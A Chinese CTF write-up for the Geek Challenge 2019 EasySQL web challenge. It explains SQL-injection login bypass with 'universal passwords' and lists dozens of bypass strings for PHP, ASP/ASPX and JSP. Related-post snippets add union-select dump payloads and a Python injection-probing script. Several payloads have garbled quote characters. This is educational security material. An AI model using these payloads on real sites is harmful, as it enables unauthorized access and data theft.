【WEB】[极客大挑战2019]EasySQL WP

最新推荐文章于 2024-11-25 22:57:33 发布
原创 最新推荐文章于 2024-11-25 22:57:33 发布 · 527 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#unctf

本文通过极客大挑战2019的EasySQL题目,介绍了SQL注入中的万能密码原理。讲解了当网站后台未过滤单引号时,如何利用万能密码进行SQL注入,包括万能密码的逻辑运算符优先级和多种表现形式。同时列举了PHP、ASP/ASPX和JSP环境下的万能密码示例。

0X0000000000000001 审题初始界面

其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码:

admin’ or ‘1’='1(红色部分为切入点,其他随意)    这道题的username随便

Got it

如名字所说,这是一道很ez的SQL注入
通过这道题,我们来延伸一下其他东西

0X0000000000000002 关于万能密码

为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗?
那么首先,让我们清楚

SQL注入-万能密码的注入原理

  • 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句
//用户登陆时,后台执行的数据库查询操作
Select user_id,user_type,email From users Where user_id='用户名' And password='密码'
  • 1_网站后台在进行数据库查询的时候没有对单引号)进行过滤,当输入用户名和万能密码【2 'or '1】的时候:
Select user_id,user_type,email From users Where user_id='admin' And password='2' or '1'
  • 2_SQL语句中逻辑运算符具有优先级

利用万能的互联网,优先级从上往下,由
:=     对变量赋值
||, OR, XOR     管道符(将前面语句作为条件,执行符号后面的语句),或(条件满足其一即返回值),异或(str1与str2比较,相同为0,不同为1)
&&, AND
NOT    否定之后的所有条件
BETWEEN, CASE, WHEN, THEN, ELSE
=, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
|
&
<, >>
-, +
*, /, DIV, %, MOD
^
- (一元减号), ~ (一元比特反转)
!
BINARY, COLLATE

由于这些优先级,SQL语句在后台解析的时候:

Select user_id,user_type,email From users Where user_id='admin' And password='2' 和'1'

两句bool进行逻辑or运算,恒为TRUE.

了解了原理过后,万能密码又有哪些呢

万能密码归纳

php:

‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–

asp aspx:

"or “a”="a
‘.).or.(’.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or.‘a.’=‘a
“or”="a’=‘a
‘or’’=’
or’=‘or’

jsp :

1’or’1’=‘1
admin’ or 1=1/*

  • 补充:

网上还看到师傅用sqlmap一把梭,我不是很会用sqlmap
点击跳转——>

[极客挑战2019]easysql
weixin_43952190的博客
04-22 1479
easysql 进入后这样的页面,正常用’会报错,然后用burp扫一下。 尽然就出来了! 原来要用万能密码就行了,现在总结一下 万能密码: asp aspx万能密码 1: "or “a”="a 2: ‘.).or.(’.a.’=’.a 3: or 1=1– 4: 'or 1=1– 5: a’or’ 1=1– 6: "or 1=1– 7: 'or.‘a.’...
BUUCTF Web[极客挑战2019] EasySQL
qq_36348811的博客
03-28 512
问题分析 题目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
[极客挑战 2019]EasySQL
m0_62709637的博客
05-28 272
重做buu,复习永远回获得你意想不到的知识; 点开后发现是一个登录界面;又因为有题目的提示所以直接寻找注入点(不过都使用登录了码,所以先使用弱口令测试一下) 看来不行 在用万能密码在试一下 发现获得flag 当然题目希望我们使用sql注入,所以我们用sql注入玩一下 (我们知道sql注入的思路是先寻找注入点,然后在一步一步的查询) (这里输入后会报错,因为太久没写懵了以下,后面想起来进行联合注入时需要让前面的输入错误,这样才方便执行之后我们的恶意语句,所以报错之后继
web-[极客挑战 2019]EasySQL
wojiushilsy的博客
04-16 561
题目要点题目内容题 题目要点 SQL注入—万能密码 题目内容 题 打开链接是一个登陆界面 最开始我认为用户名就是cl4y 只是在试密码 输入单引号'以后报错,应该是字符型注入 万能密码试一试 ????,成功 后面又试了试,用户名只要不是空,用万能密码都可以登录。 ...
极客挑战 2019EasySQL
热门推荐
Knsec
05-13 1万+
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 256
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
BUUCTF【Web】LoveSQL
qq_70434663的博客
03-06 1159
我们要找的flag就在l0ve1ysq1表里面,为什么在第两张表里面,请张你的眼睛看题目。发现爆出了字段id username password,我们的flag就在password里面。接下来就是爆出字段里面的内容,步骤同上述相同。在这里注意一下,在CTF中SQL注入漏洞flag通常会放在当前使用的数据库中,这里已经有了数据库所以可以直接爆出数据库的表。既然万能用户名行不通,那么我们就使用万能密码,用户名使用admin。既然爆出了表,接下来就是爆出表里面的字段了,同样的使用payload。
记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 3255
BUUCTF Web
BUUCTF-Web(持续更新中)
2301_80281749的博客
11-25 2908
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
[极客挑战 2019]EasySQL——WP
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
10-26 411
[极客挑战 2019]EasySQLWP
BUUCTF Web 极客挑战 2019 EasySQL
Brilliant_orange的博客
11-22 1877
(当然,我们只是猜测闭合符号是单引号,其他题目也可能是双引号)接下来,我们试试用一下万能账号或者密码两种方法(优先级:【and】>【=】>【or】,语句为真,可行,得到flag。(#后面内容注释掉了),也为真,得到flag。
极客挑战 2019]easysql 2
最新发布
09-09
给定引用中未包含极客挑战2019 easysql 2的相关内容,不过可以依据一般SQL注入题目的题思路来推测其可能的题步骤。 通常对于SQL注入题目,首先要判断注入点和闭合方式。可以尝试输入一些特殊字符,如单引号 `'`、双引号 `"`、括号 `()` 等,观察页面的响应变化。若输入特殊字符后页面报错,可能存在注入点,并且能根据报错信息判断闭合方式。就像在某些题目中输入 `1'`,与原本的单引号形成 `1''`,数据库会将其处理成 `1'` 的字符串,从而影响SQL语句的正常闭合和执行 [^3]。 判断出闭合方式后,接着要判断数据库类型和版本。可以使用一些数据库特定的函数和语句,如 `version()` 获取数据库版本,`database()` 获取当前数据库名。 之后是爆库、爆表和爆列。爆库可以使用类似 `union select 1,2,group_concat(schema_name) from information_schema.schemata` 的语句;爆表则是在确定数据库名后,用 `union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名'`;爆列就是在确定表名后,用 `union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'`,如同在 [极客挑战 2019]LoveSQL1 中爆 `l0ve1ysq1` 表的列一样 [^1]。 最后,获取所需数据,即根据前面爆出来的列名,使用 `union select 列1,列2,... from 表名` 来获取具体的数据,可能就是题目要求的 flag。 以下是一个简单的Python脚本示例,用于尝试注入: ```python import requests url = "http://example.com" # 替换为实际的题目URL payloads = ["1'", "1\"", "1')", "1\")"] for payload in payloads: data = { "username": payload, "password": "123" # 可根据实际情况修改 } response = requests.post(url, data=data) if "error" in response.text.lower(): print(f"可能的注入点和闭合方式:{payload}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值